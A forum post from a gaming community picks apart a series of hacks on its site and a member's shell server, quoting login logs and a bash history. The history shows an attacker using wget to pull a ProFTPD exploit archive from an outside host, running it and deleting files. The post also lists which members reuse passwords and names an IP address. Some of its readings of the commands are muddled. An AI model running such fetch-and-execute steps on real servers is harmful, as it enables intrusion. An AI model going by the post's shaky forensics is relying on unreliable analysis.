Very long, but very interesting I found. Hope you think is it a good read.Okay, I tried to make this as readable as possible... and you will find a lot of surprising stuff in here, so please... make sure you read it first before posting. Thanks.
The confusion
. Revolt posts logs claiming that "I now have pretty blatent proof that champ-site are the people behind the "hacking" of this site."
. What we should have concentrated on was THIS statement ."It looks like I was stupid enough to use the same password here as I did there as well, and I used it on one of my shell accounts."
. This confusion makes anyone reading the first line think that they broke into his server to use it to attack cncgamer, but if this was true the logs would have been different, they would have been trying to upload the ftp server to cncgamer or attacking cncgamer in some other way, NOT on to Revolts server then deleting it.
Hack 1
. someone stole noors password, and used it to crack his hotmail account, then use the retrieve password function on cncgamer to send his password to hotmail.
. the attacker then gained access to the ACP with his password.
. and hid themselves (by disabling the "who's online" list)
. started unregistering ND and Admin accounts (To prevent the hack being stopped, by someone with ACP access).
. deleted topics, merged forums, and screwed with topic and forum permissions.
. created kkkkkk group <-- is the k of any significance ?
. changed Revolt's status to SuperMod ((people think it's the real him), and then the attacker used that account to clear out the forum again, and again)
. the attacker then logged out to let things go quiet, then logged into the Revolt hacked login and wiped all posts, and topics a few days later.
Hack 2
. someone broke into Revolts server with a stolen password, and gained root.
. them someone fumbled around (we can see this cos of the logs) and downloaded an ftp exploit.
. no logs showed if they tried to compile it.. only logs to say they ran it.
. the ftp server was only uploaded to Revolts server, executed, then deleted, it does not look like any attempt was made to use the server to attack cncgamer.
Hack 3
. Revolt gets angry and asks Lithium to take down Champ-Site.
. Champ, WOL and XWIS go down.
. Revolt posts logs.
. - posts explanations of the logs.
. I get confused, because he thinks that he is targeted to use his server as a proxy to hack cncgamer.
. the logs make no sense... until you realise that Revolt was a victim.. NOT cncgamer.
Hack 4
. 2 minutes after I make a post based on the wrong information, cncgamer gets shutdown for 6 hours.
. who did this ? Someone who want's to stop Revolt from killing Champ ? I don't blame them for wanting that, but why kill us ?
Common things.
. how did they get the passwords ?
. someone always says the same motive - because someone pissed them off.
. on both last hacks.
. cncgamer got hacked, then champ knocked offline, and revolt admits it, but got someone . else to do it
. that's the same way, both hacks
. last time it was lucafer... and silent gave him the password
. and Revolt admitted to botting champ site
. Hacker gained access to the MySQL database by user account, and that's how the forum got killed.. NOT by SQL injection.
. lots of people come on and make up crap for fun to wind up cncgamer members, etc..
. Phils msn account has also been hacked in the past, and remember we stopped getting hacked after Phil realised and changed his msn account, and he changed his password ? So the hacker wasn't able to retrieve his password anymore.
Members who also have accounts on Champ.
hotmail passwords - champ passwords - cncgamer passwords.
. Defi -> Champ account=yes, same password=no - access on cncgamer = Founder - ACP=no. modCP=no
. WT ---> Champ account=yes, same password=no - access on cncgamer = Founder - ACP=no, modCP=no
. yablinked -> Champ account=yes, same password=yes - access on cncgamer = GFX Group - ACP=no, modCP=no
. noor -> Champ account=yes, same password=yes - access on cncgamer = Admin - ACP=yes, modCP=yes <<<< HACKED >>>>
. rob -> Champ account=yes, same password=no - access on cncgamer = Network Director - ACP=yes, modCP=yes.
. itsme -> Champ account=yes, same password=no - access on cncgamer = Moderator - ACP=no, modCP=yes
. clipser -> Champ account=yes, same password=no - access on cncgamer = Moderator - ACP=no, modCP=yes
The above people have been asked for this information, and willingly provided it for this post.
Suspects.
. Champ member (passwords are the same for ACP members) <-- maybe the database passwords are all leaked ?
. Champ hater (someone broke in and stole their accounts passwords).
. cncgamer member (perhaps someone we trust?, have you given your password to a "mate" ?)
. someone who just hates TS.
. someone with linux knowledge
Confused, not got a clue what Revolt is talking about ? Lets break this down.
I will split this into 2 parts so that the post isn't too long and boring, also so that it's easier to read.
PART 1
The Shell History Log. Revolts site got hacked
Okay, for those of you not familiar to linux... every command is logged and saved to a file called bash_history, the following quote however is not from that log, it is from the ftp server log, and tells us when users entered the ftp. (The observant among you may notice the log is upside down).
QUOTE
revolt ftpd30150 217.84.252.30 Thu Aug 26 15:51 - 16:08 (00:17)
revolt pts/1 217.84.252.30 Thu Aug 26 15:41 - 17:01 (01:20)
revolt ftpd29789 217.84.252.30 Thu Aug 26 15:30 - 15:40 (00:10)
revolt ftpd29397 217.84.252.30 Thu Aug 26 15:08 - 15:14 (00:05)
revolt ftpd29303 217.84.252.30 Thu Aug 26 15:01 - 15:06 (00:05)
revolt ftpd29049 217.84.252.30 Thu Aug 26 14:40 - 14:55 (00:15)
revolt ftpd29032 217.84.252.30 Thu Aug 26 14:39 - 14:39 (00:00)
revolt pts/1 217.84.252.30 Thu Aug 26 14:38 - 15:40 (01:02)
revolt ftpd28985 217.84.252.30 Thu Aug 26 14:37 - 14:38 (00:00)
revolt ftpd28977 217.84.252.30 Thu Aug 26 14:32 - 14:32 (00:00)
revolt ftpd28976 217.84.252.30 Thu Aug 26 14:31 - 14:32 (00:01)
revolt ftpd28867 217.84.252.30 Thu Aug 26 14:02 - 14:05 (00:02)
revolt ftpd28661 217.84.252.30 Thu Aug 26 13:41 - 14:05 (00:24)
revolt ftpd28245 217.84.252.30 Thu Aug 26 12:44 - 12:49 (00:05)
revolt ftpd28162 217.84.252.30 Thu Aug 26 12:30 - 12:35 (00:04)
revolt ftpd28080 217.84.252.30 Thu Aug 26 12:18 - 12:26 (00:07)
revolt ftpd28017 217.84.252.30 Thu Aug 26 12:09 - 12:15 (00:05)
revolt pts/1 217.84.252.30 Thu Aug 26 11:26 - 14:05 (02:39)
revolt ftpd27724 217.84.252.30 Thu Aug 26 11:18 - 11:58 (00:39)
Name: pD954FC1E.dip.t-dialin.net
Address: 217.84.252.30
The log breaks down into several parts.
But the bit we are interested in is the brackets at the end.
For example "revolt ftpd27724 217.84.252.30 Thu Aug 26 11:18 - 11:58 (00:39)" means that someone was logged on for 0 minutes and 39 seconds.
PART 2
Adam then goes on to tell us....
QUOTE
That was the login history on my shell account, here's a little log of the things this person was doing as they were logged in:
Okay, so you remember that I told you that every command is logged and saved to a file called bash_history ? Well, here is what the attacker is claimed to have done.
vi is a linux text editor, like a dos version of notepad.
Now, remember that the attacker is logged in to Revolts server, using his server to attack cncgamer so that Revolt gets the blame.
vi .mysql_history - the attacker used the "vi" text editor to read the mysql_history log
dir - now the attacker has asked the server to show a contents of the server, like dir in DOS.
ls -a - and here is the linux version of dir.. why would the attacker do this twice ?
vi .bash_profile[/color=red] - now vi is used to read the bash_profile log
[color=red]ls -a - the attacker feels the need to check what files are on the hard drive AGAIN ? why ?
vi bash_history - the attacker uses vi to view the bash_history log file, and probably delete what is in it, to make his / her movements harder to track
dir - why on earth does this attacker feel the need to keep checking what files are in the directory ?
ls -a - omg, and again ? wtf ?
dir - 3 times in a row ? does this person have a memory defect ?
vi .bash_logout - here the attacker is reading the ile bash_logout, and perhaps edited it, to make his / her movements harder to track ?
dir - here we go again with that memory problem (the attacker is reading the contents of the drive AGAIN)
ls -a - WTF ? Surely by now I don't have to tell you that the attacker is checking what files are on the drive again... this makes no sense.
vi .ssh - now the attacker is checking the ssh (remote login) log perhaps to try and remove evidence why they were there.
dir - good old ditr again (check the drive contents)
ls -a - and again
vi k.sh - and now the attacker is checking the file k.sh (or creating it, since it is not a normal part of linux)
dir - check drive contents
locate mysql - looking for the mysql database.
/usr/bin/mysql_config - now the user has changed to the mysql_configuration directory
vi ftp.c - now reading or writing a file called ftp.c (source code created for the c programming language, ready to program)
dir - check drive contents
cd proftpd-not-pro-enough - tried to change directory to the proftpd-not-pro-enough directory (is it there ?)
dir - lol, this dude is lost, keeps looking for files, or has a serious memory problem.
wget http://www.phreedom.org/solar/exploits/pro...o-enough.tar.gz - now.. here's an interesting bit... because the wget command is used for downloads... the attacker is downloading a program which is a known exploit for the ftp server.
wget http://www.phreedom.org/solar/exploits/pro...o-enough.tar.gz - did the download fail ? he the attacker tries again
wget http://www.phreedom.org/solar/exploits/pro...o-enough.tar.gz - and again ?
ls -a - now he / she checks that the file downloaded by looking for the file.
./execute_me - here the attacker is using the file to run an ftp server on cncgamer.com, this will allow the attacker to upload files.
cd /home/sex - now the attacker changes to the sex directory.
rm ex.sh - here we see a command to delete the file ex.sh
rm cool - and delete the file cool
rm cool.c - and the source code for the file cool
dir - checking to see if those files are deleted ?
rm execute_me - and now deleting the execute_me file
dir - checking again to see if the file was deleted ?
locate /mysql - now finding the mysql directory
Okay, so alot of this was probably deleted, but it could mean that the pro-ftpd exploit is still installed... if that's true, then the attacker can login to it at any tine and delete or upload what they like.
Conclusion ? - I feel it's entirely possible that more than 1 person could be involved in this attack.
Also.. how are people getting the passwords ?
Is it possible that staff on cncgamer are using the same passwords as they do on other forums ?
What password protection does champ-site offer ?
Why is cncgamer always pulled down at the beginning of the TC ?
Why did Adam use the same password for .. cncgame.. champ-site AND his server ?
What is cool.c ? and why did the attacker try and execute programs he / she knew would not exist on Revolts server, unless he / she had used the server before ?
At first I will admit I was suspicious that this log was falsified, but the more and more I went through it, the more I can see it probably wasn't.
Some bits of this log were definitely deleted, the attacker would have to use the tar command (like winzip) to decompress the files in proftpd-not-pro-enough, and then compile the source code to make a working hack, but this wasn't shown in the log, and the fact that the attacker tried to use the files makes me wonder if this wasn't the fist time he / she has logged in using Revolts server.
Basicaly
Noorodin aka d3vilmonk went on holiday a few weeks ago and he comes back to find his hotmail account HACKED
and they used the password recovery system cncgamer has to get his cncgamer password and deleted all the stuff
on cncgamer. This is kanes site?
cncgamer = hacked 3 times
champ = down
xwis = down
wol = own
Revolt blames kane
some people blame revolt
everyone from champ seems to be blaming cncgamer for "harbouring him"
oh, and somewhere.. Lithium popped up, and cncgamer got databombed again.
revolt - has pretty blatent proof that champ-site are the people behind the "hacking" cncgamer site. As he foolishly used
the same password here as there as well, and used it on one of his shell accounts.
Lithium - I dont belong to this group ect w/e but i would like to say champ-site fucked my shit up in
interland box and now they will no longer EVER own a web site again sooo have fun, being a dumbass just
doesn't pay off
cncgamer - We don't approve of what he is doing, we can't stop it, and we can't prove who did what.
Suffice to say.. if Revolts logs are real, we don't know who was in his server doing all that stuff, could be adam, could be kane,
hell it could be santa claus. The only thing we know is that adam (Revolt) was silly enough to use the same passwords on several
sites, and that according to the user known as - in the Revolts logs explained topic, it would appear that the "hacker" may have
already used his box to hack cncg. So.. please stop with all the "cncgamer hacked this" crap, cos Revolt has openly admitted it is him, and Lithium.